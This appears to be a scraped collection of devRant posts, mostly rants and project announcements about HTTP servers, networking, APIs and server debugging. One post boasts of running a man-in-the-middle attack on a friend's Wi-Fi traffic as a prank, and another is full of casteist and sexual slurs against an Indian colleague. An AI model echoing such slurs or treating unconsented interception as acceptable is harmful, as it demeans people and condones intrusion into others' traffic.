Like, how about we talk performance?
How about distributed algorithms that don't waste 40% of their computing power on agent communication and pointless overhead (like the serialisation/deserialisation of messages across the execution boundary for every single call)?
How about vertical scaling without forking the entire address space (and thus multiplying your application's memory consumption by the number of cores you wish to use)?
How about utilising logical CPUs to the fullest extent, and allowing them to execute JavaScript? Something that isn't even possible with the current model implemented by Node?
Some will say that the performance gains aren't worth the risk. That the possibility of race conditions and deadlocks aren't worth it.
That's the point of cooperative multithreading. It is a way to smartly work around these issues.
If you use promises, they will execute in parallel, to the best of the scheduler's abilities, and if you chain them then they will run consecutively as planned according to their dependency graph.
If your code doesn't access global variables or shared closure variables, or your promises only deal with their provided inputs without side-effects, then no contention will *ever* occur.
If you only read and never modify globals, no contention will ever occur.
Are you seeing the same trend I'm seeing?
Good JavaScript programming practices miraculously coincide with the best practices of thread-safety.
When someone says we shouldn't use multithreading because it's hard, do you know what I like to say to that?
"To multithread, you need a pair."18 -
It fucking staggers me how many backend/devops-y people don't understand what a client side "request timeout" is, versus a server side one.
What does it mean:
The client was fed up with the servers bullshit, and decided to piss off and not wait around for the server to take forever to respond, because life's too short.
How not to solve/debug this issue:
- "I've checked the API request in tool xyz, and it works fine for me"
Congratulations, you've figured out how to call an API once, in isolation to the rest of the application, and without any excessive load. And using a different client to me, with a different configuration. Lets get back to actually looking at the issue shall we?
- "I only see HTTP 200's in the logs"
Yep, you probably will in most circumstances, because its the client complaining about it taking too long, not the server. If the server was telepathetic and knew what the client was thinking/doing at all times, we wouldn't have half of the errors we do.
- "Ah ok, I understand ... so how do I solve this?"
Your asking me? I don't fucking know, I didn't build the server! Put better logging in place and figure out why sometimes it takes forever.
Jesus fucking christ14 -
You know what really pisses me off about the dev community is the circle jerk that ensues when someone bashes something they have no experience in. Take yesterday's React bash on Reddit and DevRant. Thomas Fuchs compared React and JSX to the intermingling of HTML CSS and JS of 15 years ago. If you knew anything about React or spent 1 hour learning what it's about you would immediately know why that isn't true but no, a giant circle jerk ensued comparing it to PHP! I'm sorry but HOW can you compare a pure JS view library that is renderable by the browser, to a full fledged server side language?? Not to mention the React approach uses a completely different programming paradigm of functional programming.
When I first saw React and Redux I realized what this is all really about, a shift in the paradigms of programming. React + Redux is the first time that functional programming has entered mainstream. We've had functional programming available to us via Haskell and more recently Clojure for a while now but it was never very obvious how powerful functional programming could be outside of the niche that used it for more analytical type tools. Now we have things like hot reloading (https://youtube.com/watch/...) and state playback (https://youtube.com/watch/... skip to ~3min to watch the magic) thanks to immutable state.
Before you decide that React is just another flavor of the month library I encourage you to learn about the advantages that functional programming provides (https://medium.com/@cscalfani/...) and checkout Elm (http://elm-lang.org/) as well. The nice thing about React + Redux is that it gives us a way to start programming functionally, without having to learn ML style syntax like Elm and ClojureScript. Keep in mind, when Object Oriented Programming was becoming popular it was widely controversial as well and look at all it has done for us.4 -
That's actually something that happened fairly recently.. just that I didn't have the energy left at the time to write it down. That, or I got my ass too drunk to properly write anything.. not sure actually.
So on paper I'm unemployed, but I do spend some time still on pretty much voluntary work for HackingVision, along with a handful of other people.
At the time, we were just doing the usual chit-chat in the admin channel, me still sick in my bed (actually that means that I wasn't drunk but really tired for once.. amazing!) and catching up to what happened, but unable to do any useful work in this sick state. So, tablet, typing on glass, right. I didn't have any keyboard attached at the time.
One of the staff members (a wanketeer from India) apparently had an assignment in a few hours for which he needed to write a server application in Java. Now, performance issues aside, I figured.. well I've got quite a bit of experience with servers, as well as some with client-server protocols. So I got thinking.. mail servers, way too overengineered. Web servers.. well that could work, I've done some basic netcat webservers that just sent an HTTP 200 OK and the file, those worked fine.. although super basic of course. And then there's IRC, which I've actually talked to an InspIRCd server through telnet before (which by the way is pretty much the only thing that telnet is still useful for, something that was never its purpose, lol) and realized that that protocol is actually quite easy to develop around. That's why I like it so much over modern chat protocols like XMPP, MQTT and whatnot. So I recommended that he'd write a little IRC server in Java. Or even just a chatbot like I attempted to at the time, considering that that's - with a stretch of course - a sort-of server too.
His fucking response however, so goddamn fucking infuriating. "If the protocol is so easy, then please write me down how to implement it in Java."
Essentially do his fucking work for him. I don't know Java, but as a fucking HackingVision admin, YOU SHOULD FUCKING KNOW THAT HACKERS CAN'T STAND LAZY CUNTS THAT CAN'T EVEN BE ASSED TO GOOGLE SHIT!!! If I wanted to deal with cunts like that, I'd have opened the page inbox with all its Fb h4xx0ring questions, not the fucking admin chat!
And type it on a goddamn fucking piece of glass, while fucking sick?! Get your ass fucked by a bobs and vegana horny fuck from the untouchable caste, because that's where you fucking belong for expecting THAT from me, you fucking bhenchod.
But at least I didn't get my ass enraged like that to say that to him in the admin chat. Although that probably wouldn't have been a bad thing, to get his feet right back on the ground again.1 -
The IT head of my Client's company : You need to explain me what exactly you are doing in the backend and how the IOT devices are connected to the server. And the security protocol too.
Me : But it's already there in the design documents.
IT Head : I know, but I need more details as I need to give a presentation.
Me : (That's the point! You want me to be your teacher!) Okay. I will try.
IT Head : You have to.
Me : (Fuck you) Well, there are four separate servers - cache, db, socket and web. Each of the servers can be configured in a distributed way. You can put some load balancers and connect multiple servers of the same type to a particular load balancer. The database and cache servers need to replicated. The socket and http servers will subscribe to the cache server's updates. The IOT devices will be connected to the socket server via SSL and will publish the updates to a particular topic. The socket server will update the cache server and the http servers which are subscribed to that channel will receive the update notification. Then http server will forward the data to the web portals via web socket. The websockets will also work on SSL to provide security. The cache server also updates the database after a fixed interval.
This is how it works.
IT Head : Can you please give the presentation?
Me : (Fuck you asshole! Now die thinking about this architecture) Nope. I am really busy.11 -
By heavens creating your own api server with the Go standard lib is so easy it should be fucking criminal.
Now....on to add authentication and a nice frontend stack(prob React) to make it all spiffy and show it to my manager and see if she lets me put this shit to use at work.
It will make it more interesting. It took me nearly 1 hour to get what I needed from the docs, build it using the net package first(das right babe, pure TCP) and just a couple of minutes more for net/http and boom. Ferching info and shit left and right
Man I love this shit. Wish I could do this for a living. Stuck fucking around with css, Java and php at work instead ;____;10 -
I seriously do not understand the rants against Windows.
I love Windows 10 (got as free upgrade from MS), and have no issues with MacOS or Linux OS. I use them as well but do all serious work on Windows.
All my life, I have worked on business / commercial side and picked up Web development in last couple of years. I started using computers on DOS in 1992, and shifted to Windows 3.0 in 1995. There was no Mac or MacOS back then.
For serious work, I purchased a old Dell Precision M4700 workstation grade laptop with quad-core i7, at throwaway price, got 32GB RAM, 2.4TB (1x2 TB + 400gb) of SSD on super sale online, and installed it myself. It easily supports dual 4k monitors.
Git-bash on windows allows all the necessary linux command line on windows. Though not tried, Windows 10 allows embedded Ubunutu with linux terminal. Web development tools like - VSCode, git, github / bitbucket clients, NVM/Node, React / Redux / Webpack / Gatsby / Jest, REST clients, GraphQL client and server, Graph Server, Chrome PWA / Chrome Dev Tools, http/Websocket/WebRTC interception, Google Firebase SDKs, AWS sdks, cloud utilities, CI/CD tools work flawlessly. Windows even has its own package manager for applications.31 -
@netikras since when does proprietary mean bad?
Lemme tell you 3 stories.
CISCO AnyConnect:
- come in to the office
- use internal resources (company newsletter, jira, etc.)
- connect to client's VPN using Cisco AnyConnect
- lose access to my company resources, because AnyConnect overwrites routing table (rather normal for VPN clients)
- issue a route command updating routing table so you could reach confluence page in the intranet
- route command executes successfully, `route -n` shows nothing has changed
- google this whole WTF case
- Cisco AnyConnect constantly overwrites OS routing table to ENFORCE you to use VPN settings and nothing else.
Sooo basically if you want to check your company's email, you have to disconnect from client's VPN, check email and reconnect again. Neat!
Can be easily resolved by using opensource VPN client -- openconnect
CISCO AnyConnect:
- get a server in your company
- connect it to client's VPN and keep the VPN running for data sync. VPN has to be UP at all times
- network glitch [uh-oh]
- VPN is no longer working, AnyConnect still believes everything is peachy. No reconnect attempts.
- service is unable to sync data w/ client's systems. Data gets outdated and eventually corrupted
OpenConnect (OSS alternative to AnyConnect) detects all network glitches, reports them to the log and attempts reconnect immediatelly. Subsequent reconnect attempts getting triggered with longer delays to not to spam network.
SYMANTEC VIP (alleged 2FA?):
- client's portal requires Sym VIP otp code to log in
- open up a browser in your laptop
- navigate to the portal
- enter your credentials
- click on a Sym VIP icon in the systray
- write down the shown otp number
- log in
umm... in what fucking way is that a secure 2FA? Everything is IN the same fucking device, a single click away.
Can be easily solved by opensource alternatives to Sym VIP app: they make HTTP calls to Symantec to register a new token and return you the whole totp url. You can convert that url to a qr code and scan it w/ your phone (e.g. Google's Authenticator). Now you have a true 2FA.
Proprietary is not always bad. There are good propr sw too. But the ones that are core to your BAU and are doing shit -- well these ARE bad. and w/o an oppurtunity to workaround/fix it yourself.13 -
We got DDoS attacked by some spam bot crawler thing.
Higher ups called a meeting so that one of our seniors could present ways to mitigate these attacks.
- If a custom, "obscure" header is missing (from api endpoints), send back a basic HTTP challenge. Deny all credentials.
- Some basic implementation of rate limiting on the web server
We can't implement DDoS protection at the network level because "we don't even have the new load balancer yet and we've been waiting on that for what... Two years now?" (See: spineless managers don't make the lazy network guys do anything)
So now we implement security through obscurity and DDoS protection... Using the very same machines that are supposed to be protected from DDoS attacks.17 -
Node.JS is great sometimes. Here is my HTTP(s) server script, which is 117 generously spaced lines, including a small database of MIMEs, which serves raw files OR allows you to set up request handlers like the one you see here.
Very, super happy with the outcome.4 -
I have finally launched my own mirror. I would really appreciate if you guys that use Raspbian could start using my mirror so I can see if shit works :)
More distros are underway!
deb http://mirror.linux.pizza/raspbian/ jessie main contrib non-free rpi
deb-src http://mirror.linux.pizza/raspbian/ jessie main contrib non-free rpi
Server is hosted in southern Sweden25 -
devCraft [
HI GUYS! THE SERVER HAS FINALLY BEEN TRANSFERRED OVER!
There's only a few mods right now. please note, for multimc users there IS a multimc instance as well. server will not be run in offline mode, sorry cracked users.
All connection info and downloads at
http://github.com/parkcitymedia/...62 -
Occasionally i got my badass moments at work.
But that one bachelor party in Barcelona where about 10 of my pals and I came back from a soccer match topped it all.
As we got back to our AirBnB apartment i went to the bathroom and scanned the WiFi.
I found the IP address of the bachelor's party man of honor and MITM attacked him.
So each image from any http server would automatically get swapped with a picture i took just an hour ago from the game we were at.
5 minutes later i hear the screams "OMFG WE ARE ALL ON THE NEWS GUYS!!!" and "LOOK AT SPORTS SITE X AND NEWS SITE Y!!"
The saga continued with some cheers in the beginning and some confusion, but ended when another friend rat on me..
But boy it was glorious 😂 -
"200 Internal Server Error"
Yep, I did that. Because the lousy crapheads I work with were too lazy to handle any other HTTP status so anything else breaks the whole thing. And it's a pain to roll out another release of their part of the backend so "this isn't a priority". Also, they don't feel the need to check the JSON body of the response for the "status":"ok"/"fail" because what could ever go wrong, right? I effectively have no way of conveying to them that there was an error on this end of the API so they show success toast on the frontend irrespective of what really happened.6 -
Fucking shit, this university's website is so damn slow! Basically Every Semester, every student need to enroll to certain classes in University Website.
But the Infrastructure is not enough to handle such a big amount of students, we have approx. 7000 students enrolling at the same fucking time.
And here i am can't enroll to any class at all this semester. Fuck such a waste of time. This always been a thing since they digitalize enrolling system.
I don't want this to happen again. The student always be a victim since they cannot handle the request. Now, as a dev, i want to propose something better to optimize the server, i have some connection to pass some bureaucracy. I am going to do some brainstorming and I will need some solution.
Here some data i gather when i am mad from my univ infrastructure division :
1. The Server is a simple Local Server Forwarded to the Internet.
2. The Server use Windows Server 2007.
4. Web Server Using Microsoft IIS
3. The Website built using ASP.NET
4. The connection is not SSL encrypted (yes its fucking use the http)
5. Hardware Spec (not confirmed officialy, i got this information from my professor) :
- Core i5 4460
- 4 GB Ram
- 1 Gbit NIC
I will summon some expert here and i hope want to help me(us all) out.24 -
So I've been developing something I call P.A.R.N! (terrible name, I know) that recursively scans a folder for images and serves up a picture gallery via http using those images.
What do you all think?
https://github.com/AdamWelch1/...
I just wanted to share my latest personal project here 😶
The funnest part for me was writing the web server part :P20 -
I hate it when you get tunnel vision and forget simple solutions exist. Especially when you make yourself sound dumb in doing so.
Spent a bunch of time trying to wrap my head around how you could send data from one website to another and dynamically load content and all this other stuff, only to be told a GET call would make it a lot easier.
With my head in the clouds thinking of complex solutions I said "can you open a new page with a GET call?"
Can you. Open. A new page. With a GET call.
Yes, dumbass, of course you can. Here I am trying to figure out how it's possible to intercept data from a different websites HTTP call to the server and I asked if it's possible to do what ~literally~ a link does.3 -
Apparently DELETE and... most of the HTTP verbs are disabled by default in IIS (ASP/ MVC/ Microsoft server software)
Am I wrong in saying that's fucking bullshit?!
Why make an HTTP serving environment with a massive array of tools to help you do everything you need in the web environment... And then DISABLE some of the web protocol??? What???
Not even the obscure verbs. DELETE. Is microsoft the type of bitch to delete using a GET request?? I bet the send passwords as get parameters.8 -
My favorite OpenSource project is Julia (www.julialang.org). As a physicist, I could never really befriend myself with OOP. With Julia I can write beautiful Code, which I also understand (with full UTF-8 support).
In Python you write pseudo code in Julia you write math.
In Addition, there is an optional package on Github for every fuck which can be handled by the integrated package manager (like using QML, Distributions, Databases, HTTP Server, and so on...)4 -
So here I am reinventing the wheel making an HTTP server in C.
Finished implementing HTTP/1.1 and WebSockets support and now I find out the current thingy is HTTP/2.
Well that's fine, I'll add support for that later. In fact I kinda dig it since it uses binary conventions instead of plain text ones.
I dig a little bit and find out there already is an HTTP/3 going around which uses UDP.
Why me.5 -
Him: Why choose 200 over 500, minimalist?
Me: Why choose an internal server error over a successful request? Less is more. -
"There's more to it"
This is something that has been bugging me for a long time now, so <rant>.
Yesterday in one of my chats in Telegram I had a question from someone wanting to make their laptop completely bulletproof privacy respecting, yada yada.. down to the MAC address being randomized. Now I am a networking guy.. or at least I like to think I am.
So I told him, routers must block any MAC addresses from leaking out. So the MAC address is only relevant inside of the network you're in. IPv6 changes this and there is network discovery involved with fandroids and cryphones where WiFi remains turned on as you leave the house (price of convenience amirite?) - but I'll get back to that later.
Now for a laptop MAC address randomization isn't exactly relevant yet I'd say.. at least in something other than Windows where your privacy is right out the window anyway. MAC randomization while Nadella does the whole assfuck, sign me up! /s
So let's assume Linux. No MAC randomization, not necessary, privacy respecting nonetheless. MAC addresses do not leak outside of the network in traditional IPv4 networking. So what would you be worried about inside the network? A hacker inside Starbucks? This is the question I asked him, and argued that if you don't trust the network (and with a public hotspot I personally don't) you shouldn't connect to it in the first place. And since I recall MAC randomization being discussed on the ISC's dhcp-users mailing list a few months ago (http://isc-dhcp-users.2343191.n4.nabble.com/...), I linked that in as well. These are the hardcore networking guys, on the forum of one of the granddaddies of the internet. They make BIND which pretty much everyone uses. It's the de facto standard DNS server out there.
The reply to all of this was simply to the "don't connect to it if you don't trust it" - I guess that's all the privacy nut could argue with. And here we get to the topic of this rant. The almighty rebuttal "there's more to it than that!1! HTTPS doesn't require trust anymore!1!"
... An encrypted connection to a website meaning that you could connect to just about any hostile network. Are you fucking retarded? Ever heard of SSL stripping? Yeah HSTS solves that but only a handful of websites use it and it doesn't scale up properly, since it's pretty much a hardcoded list in web browsers. And you know what? Yes "there's more to it"! There's more to networking than just web browsing. There's 65 THOUSAND ports available on both TCP and UDP, and there you go narrow your understanding of networking to just 2 of them - 80 and 443. Yes there's a lot more to it. But not exactly the kind of thing you're arguing about.
Enjoy your cheap-ass Xiaomeme phone where the "phone" part means phoning home to China, and raging about the Google apps on there. Then try to solve problems that aren't actually problems and pretty vital network components, just because it's an identifier.
</rant>
P.S. I do care a lot about privacy. My web and mail servers for example do not know where my visitors are coming from. All they see is some reverse proxies that they think is the whole internet. So yes I care about my own and others' privacy. But you know.. I'm old-fashioned. I like to solve problems with actual solutions.11 -
Today I spent 25 minutes explaining to this dev that there’s no way that a http request can access directly to an ftp server and retrieve a file.
A dev with 4 years of experience...17 -
I once saw a YouTube video when youtube first started of this kid. He was a proud "hacker" and had this short video teaching everyone exactly how to hack Google.
He goes to the the terminal and types "ping http://google.com"
As the server responds, he tells everyone that was exactly how anyone can go and hack Google.
Clearly he was wrong, but he felt like more of a black hat than any of us ever will. -
I've made the json protocol. It's a protocol containing only json. No http or anything.
To parse an json object from a stream, you need a function that returns the length of the first object/array of all your received data. The result of that function is to get the right chunk of the json to deserialize.
For such function, json needs to be parsed, so I wrote that function in C to be used with my C server and Python client. I finally implemented a C function into python function that has a real benefit / use case. Else you had to validate but by bit by the python json parser and that's slow while streaming. Some messages are quite big.
Advantage of this protocol is that it's full duplex.
I'm very happy!36 -
Has been a long time since I'm appreciating working with GRPC.
Amazingly fast and full-featured protocol! No complaints at all.
Although I felt something was missing...
Back in the days of HTTP, we were all given very simple tools for making requests to verify behaviours and data of any of our HTTP endpoints, tools like curl, postman, wget and so on...
This toolset gives us definitely a nice and quick way to explore our HTTP services, debug them when necessary and be efficient.
This is probably what I miss the most from HTTP.
When you want to debug a remote endpoint with GRPC, you need to actually write a client by hand (in any of the supported language) then run it.
There are alternatives in the open source world, but those wants you to either configure the server to support Reflection or add a proxy in front of your services to be able to query them in a simpler way.
This is not how things work in 2018 almost 2019.
We want simple, quick and efficient tools that make our life easier and having problems more under control.
I'm a developer my self and I feel this on my skin every day. I don't want to change my server or add an infrastructure component for the simple reason of being able to query it in a simpler way!
However, This exact problem has been solved many times from HTTP or other protocols, so we should do something about our beloved GRPC.
Fine! I've told to my self. Let's fix this.
A few weeks later...
I'm glad to announce the first Release of BloomRPC - The first GRPC Client GUI that is nice and simple,
It allows to query and explore your GRPC services with just a couple of clicks without any additional modification to what you have running right now! Just install the client and start making requests.
It has been built with the Electron technology so its a desktop app and it supports the 3 major platforms, Mac, Linux, Windows.
Check out the repository on GitHub: https://github.com/uw-labs/bloomrpc
This is the first step towards the goal of having a simple and efficient way of querying GRPC services!
Keep in mind that It is in its first release, so improvements will follow along with future releases.
Your feedback and contributions are very welcome.
If you have the same frustration with GRPC I hope BloomRPC will make you a bit happier!3 -
FYI if you have ES file explorer get rid of it cause it has a major vuln that lets other extract files from your phone
https://xda-developers.com/es-file-...
There are many better alternatives, i personally use FX.
…
...
...WHY TF DOES A FILE EXPLORER RUN AN HTTP SERVER IN BACKGROUND ?!23 -
I just got pissed off when someone on my team asked me how to start a web server on port 8080 (needed for network port testing)
I check the port get 404. 🤔🤔🤔
Spend half an hour explaining to them about ports and how there's already a week server running... And that 404 is a HTTP Status code.
I'm pretty sure she works on our webapp and maybe even REST APIs...
New grad but still.... Not recognizing a 404?
Maybe those pretty 404 pages these days make the realizing that it's a fucking web server error response harder....1 -
Dear fellow developers: Let's talk about the Internet. If you're reading this post, you've probably heard of it and are comfortable using it on a regular basis. You may even develop software that works over the internet, and that's fine and great! But you have to draw the line somewhere, and that line has been pushed farther and farther back as time goes on.
Let's talk about video games. The first game that really got me into FPSes was Team Fortress 2. Back in the day, it had a great community of casual and competitive groups alike, and there were hats! Underneath the hood was a massive number of servers. Some were officially hosted, some were run by independent communities. It had a built-in browser and central index where you could find every publically-available server and connect to it. You could even manually input connection details if that failed. In my opinion, this was a near-perfect combination of optimal user-experience and maximum freedom to run whatever the hell you wanted to. Even today, if Valve decided to stop hosting official servers, the smaller communities could still stay afloat. Fifteen years in the future, after all demand has died off, someone can still recover the server software and play a game with their kids.
Now, contrast that to a game like Overwatch. Also a very pivotal game in the FPS world, and much more modern, but what's the underlying difference in implementation? NO SUPPORT FOR SELF-HOSTED SERVERS. What does that mean when Blizzard decides to stop hosting its central servers? IT DIES. There will be no more multiplayer experience, not now, not ever. You will never be able to fully share this part of your history with future generations.
Another great example is the evolution of voice chat software. While I will agree that Discord revolutionized the market, it took away our freedom to run our own server on our own hardware. I used to run a Mumble server, now it has fallen out of use and I miss it so much.
Over time, client software has become more and more dependent on centrally-hosted services. Not many people will think about how this will impact the future usability of the product, and this will kill our code when it becomes legacy and the company decides to stop supporting it. We will have nothing to give to future generations; nobody will be able to run it in an emulator and fully re-experience it like we can do with older games and software.
This is one of the worst regressions of our time. Think about services like IRC, SMTP, SSH, even HTTP, how you're so easily able to connect to any server running those protocols and how the Internet would change if those were replaced with proprietary software that depended on a central service.
(Relevant talk (16:42): https://youtu.be/_e6BKJPnb5o?t=1002)6 -
This evening for curiosity i executed a nmap over my android phone expecting (like everyday) all port closed.
But i see
9080/tcp open glrpc
Wtf??
Let me check something....
--adb shell
$cat /etc/net/tcp
And the first line provied me the UID of the app that was running on 9080 port (2378 in hex)
So let me check which app is that
$dumpsys package | grep -A1 "userId=*UID*"
And the answer is com.netflix.mediaclient
Wtf??
Why netflix is running a http server on 9080/tcp on and android phone??3 -
wk66 {
Don’t pay as much for things that aren’t as important.
}
tl;dr {Mobo won’t POST.};
Backstory:
Me and @Rekonnect built a website a few years ago. So I built a “server” and ran server 2008 on it. Our server was very budget oriented and featured the following:
AMD Athlon X4 860K
Biostar Hi-Fi A70U3P
8GB G.Skill Ripjaws series
Small HDD
R5 220 Core Edition
EVGA 430W
ODD
Over the years, I’ve made many changes. Now it’s a GTX 960 with 3 Small SSDs and one large HDD. No internal optical. PSU is now at 600W from EVGA. Also a really old Sound Blaster sound card just for the fun of it. The case is now a Corsair SPEC-01. Put a T92 CPU cooler and 3 Riing RGB case fans and you’re ready to go. I was getting ready to put a third monitor but haven’t gotten to it.
If you’ve been following my rants recently, you would’ve seen that I was interested in developing iOS apps. Thanks to the team at http://AMD-OSX.com and four days of work, I’ve installed macOS on one of the SSDs. I think.
The computer won’t POST.
I’ve tried everything and nothing seems to work. Well, there goes my hopes and dreams. Let’s hope I can borrow money from my parents to at least replace my motherboard. :(
Ideas/Help?
FYI: I at one point did get 4 beeps in post, the system decided to upgrade firmware, and the BIOS people are American Megatrends.
Anything will be appreciated.9 -
Just started using the Dropbox API. Want to do a simple directory listing of my files. Sends HTTP GET request at https://api.dropboxapi.com/2/files/....
"Error in call to API function "files/list_folder": Your request's HTTP request method is "GET". This function only accepts the HTTP request method "POST"."
What. The. Fuck. Dropbox.
HTTP POST is for creating a new instance of a resource. HTTP GET is for reading. GET guarantees server state is not changed while POST does not. I want to fucking list a directory, not put stuff in it.1 -
I actually never felt the need to scream at a co-worker so let's talk about that time a co-worker screamed at me instead.
tl;dr : some asshole boss screamed and threatened me because someone else's project was shit and didn't work.
Context: I was in my third year of school internship (graded) and my experience is C, C++, C#, Python all in systems programming, no web.
I was working as an intern for a shit company that was selling a shit software to hospitals (though not medically critical, thank God) the only tech guy on site was the DBA (cool guy) the product was maintained by a single dev in VB from his house, the dude never showed up to work (you'll understand why) and an other intern who couldn't dev shit.
I was working with the DBA on an software making statistical analysis from DB exports, worked nice, no problems here if we forget the lack of specs or boundaries (except must work in ieShit).
The other intern was working on something else (don't ask me what it is) I just remember it was in GWT before the community revived it. His webapp was requesting the company http server for a file instead of having one of it's java servlet to fetch it (both apps ran on sane server) which caused a lot of shit especially CORS error. That guy left (end of contract) and leaves his shit as is, boss asked me to deploy the app, I fiddle with it to see if it works and when I find out it doesn't then that asshole starts screaming at me in front of every other employee present, starts threatening to burn me in the tech world and have me thrown out of my school for no goddamn reason than the other dude's project doesn't work.
After the screaming I leave and warn my school immediately.
I guess that's why the other dev never came to work.
I had three weeks of internship left, that I did from home and worked probably less than 2 hours a day so suck it asshole.
Still had a good grade because I was reviewed by the DBA and he was happy with the work I did.
It was only later that I realized that what he did was categorizing as harassment (at least in France) and decided that never again this would happen without a response from my lawyer.1 -
I don't know what you did yesterday, but i did make my company throw away 2 months of progress.
It all started in the beginning, since that i've made numerous complaints about the workflow or code and how to improve it. I've been told off every time, and every time i either told the boss who agreed in the end or wrote code to prove myself. Everything was a hassle and my tasks weren't better.
Team lead: you'll do X now, please do that by making Y.
Me: but Y is insecure, we should do Z.
Team lead: please do Y
Later it turns out Y is impossible and we do Z in the end...
Team lead: please do W now
Me, a few days later: i've tried and their server doesn't give http cors headers, doing W in the browser is impossible
Team lead, a few days later: have you made progress on W?
Me: * tells again it's impossible and uploads code to prove it *
Team lead: * no response *
After that i had enough. Technically i still was assigned to do W, but i used my time to look over the application and list all the things wrong with it. We had everything, giant commits, commented out code, unnecessary packages, a new commit introduced packages that crashed npm install on non-macs, angularjs-packages even though we use angular, weird logic, a security bug, all css in one file even though you can use component-specific css files...
I sent that to my boss, telling him to let the backend-guys have a look at it too and we had a meeting about this. I couldn't attend but they agreed with me completely. They decided to throw away what we have already and to let one of the backend-guys supervise our team. I guess there will be another talk with the team lead, but time will tell.
It feels so good having hope to finally escape this hellish development cycle of badly defined task, bad communication and headache-inducing merges. -
If an http request can't perform the requested operation, should server send 500 error code? Or 200 with status and status message in response?
Isn't 500 used only for unhandled exceptions on server side?11 -
In today's episode of kidding on SystemD, we have a surprise guest star appearance - Apache Foundation HTTPD server, or as we in the Debian ecosystem call it, the Apache webserver!
So, imagine a situation like this - Its friday afternoon, you have just migrated a bunch of web domains under a new, up to date, system. Everything works just fine, until... You try to generate SSL certificates from Lets Encrypt.
Such a mundane task, done more than a thousand times already... Yet... No matter what you do, nothing works. Apache just returns a HTTP status code 403 - Forbidden.
Of course, what many folk would think of first when it came to a 403 error is - Ooooh, a permission issue somewhere in the directory structure!
So you check it... And re-check it to make sure... And even switch over to the user the webserver runs under, yet... You can access the challenge just fine, what the hell!
So you go deeper... And enable the most verbose level of logging apache is capable of - Trace8. That tells you... Not a whole lot more... Apparently, the webserver was unable to find file specified? But... Its right there, you can see it!
So you go another step deeper and start tracing the process' system calls to see exactly where it calls stat/lstat on the file, and you see that it... Calls lstat and... It... Returns -1? What the hell#2!
So, you compile a custom binary that calls lstat on the first argument given and prints out everything it returns... And... It works fine!
Until now, I chose to omit one important detail that might have given away the issue to the more knowledgeable right away. Our webservers have the URL /.well-known/acme-challenge/, used for ACME challenges, aliased somewhere else on the filesystem - To /tmp/challenges.
See the issue already?
Some *bleep* over at the Debian Package Maintainer group decided that Apache could save very sensitive data into /tmp, so, it would be for the best if they changed something that worked for decades, and enabled a SystemD service unit option "PrivateTmp" for the webserver, by default.
What it does is that, anytime a process started with this option enabled writes to /tmp/*, the call gets hijacked or something, and actually makes the write to a private /tmp/something/tmp/ directory, where something... Appeared as a completely random name, with the "apache2.service" glued at the end.
That was also the only reason why I managed fix this issue - On the umpteenth time of checking the directory structure, I noticed a "systemd-private-foobarbas-apache2.service-cookie42" directory there... That contained nothing but a "tmp" directory with 777 as its permission, owned by the process' user and group.
Overriding that unit file option finally fixed the issue completely.
I have just one question - Why? Why change something that worked for decades? I understand that, in case you save something into /tmp, it may be read by 3rd parties or programs, but I am of the opinion that, if you did that, its only and only your fault if you wrote sensitive data into the temporary directory.
And as far as I am aware, by default, Apache does not actually write anything even remotely sensitive into /tmp, so...
Why. WHY!
I wasted 4 hours of my life debugging this! Only to find out its just another SystemD-enabled "feature" now!
And as much as I love kidding on SystemD, this time, I see it more as a fault of the package maintainers, because... I found no default apache2/httpd service file in the apache repo mirror... So...8 -
Http/2 server push is really cool. Like, really fucking cool. Those researchers at google really got this right. I hate how they handle their users but I have to say they really make good use of the money they get by selling us for kettle.2
-
oh, I have a few mini-projects I'm proud of. Most of them are just handy utilities easing my BAU Dev/PerfEng/Ops life.
- bthread - multithreading for bash scripts: https://gitlab.com/netikras/bthread
- /dev/rant - a devRant client/device for Linux: https://gitlab.com/netikras/...
- JDBCUtil - a command-line utility to connect to any DB and run arbitrary queries using a JDBC driver: https://gitlab.com/netikras/...
- KubiCon - KuberneterInContainer - does what it says: runs kubernetes inside a container. Makes it super simple to define and extend k8s clusters in simple Dockerfiles: https://gitlab.com/netikras/KubICon
- ws2http - a stateful proxy server simplifying testing websockets - allows you to communicate with websockets using simple HTTP (think: curl, postman or even netcat (nc)): https://gitlab.com/netikras/ws2http -
Just got an email from my company that a http server app I wrote years ago exposed the whole server it runs on because of a misconfig parametered...
Can use it to read any file using server.com/path/to/file1 -
Java Server Faces!
Don't get me wrong, I kinda love coding Java, but JSF is just a horrible technique for web development.
Had to do it since my company got to maintain an already existing backend which the customer wanted to have some more Features but the original dev didnt continue to support.
Attached hello world example from good old mykong for those not knowing jsf: http://mkyong.com/jsf2/...4 -
When some other team wants to blame us because they're getting a HTTP Status Code 0....
That's not even a valid status... IT MEANS YOU ABORTED THE REQUEST AND KILLED THE CONNECTION...
OH STILL OUR FAULT... WELL DO U KNOW ABOUT NETWORK ISSUES AND SERVER OVERLOADING WHEN U SPAM IT WITH TOO MANY REQUESTS?
OH YOU RETRIED? HOW DID YOU RETRY? BETTER NOT BE SPAMMING US WITH MORE REQUESTS...
EVER HEARD OF TCP/IP BACK OFF LOGIC....4 -
I used to be a sysadmin and to some extent I still am. But I absolutely fucking hated the software I had to work with, despite server software having a focus on stability and rigid testing instead of new features *cough* bugs.
After ranting about the "do I really have to do everything myself?!" for long enough, I went ahead and did it. Problem is, the list of stuff to do is years upon years long. Off the top of my head, there's this Android application called DAVx5. It's a CalDAV / CardDAV client. Both of those are extensions to WebDAV which in turn is an extension of HTTP. Should be simple enough. Should be! I paid for that godforsaken piece of software, but don't you dare to delete a calendar entry. Don't you dare to update it in one place and expect it to push that change to another device. And despite "server errors" (the client is fucked, face it you piece of trash app!), just keep on trying, trying and trying some more. Error handling be damned! Notifications be damned! One week that piece of shit lasted for, on 2 Android phones. The Radicale server, that's still running. Both phones however are now out of sync and both of them are complaining about "400 I fucked up my request".
Now that is just a simple example. CalDAV and CardDAV are not complicated protocols. In fact you'd be surprised how easy most protocols are. SMTP email? That's 4 commands and spammers still fuck it up. HTTP GET? That's just 1 command. You may have to do it a few times over to request all the JavaScript shit, but still. None of this is hard. Why do people still keep fucking it up? Is reading a fucking RFC when you're implementing a goddamn protocol so damn hard? Correctness be damned, just like the memory? If you're one of those people, kill yourself.
So yeah. I started writing my own implementations out of pure spite. Because I hated the industry so fucking much. And surprisingly, my software does tend to be lightweight and usually reasonably stable. I wonder why! Maybe it's because I care. Maybe people should care more often about their trade, rather than those filthy 6 figures. There's a reason why you're being paid that much. Writing a steaming pile of dogshit shouldn't be one of them.6 -
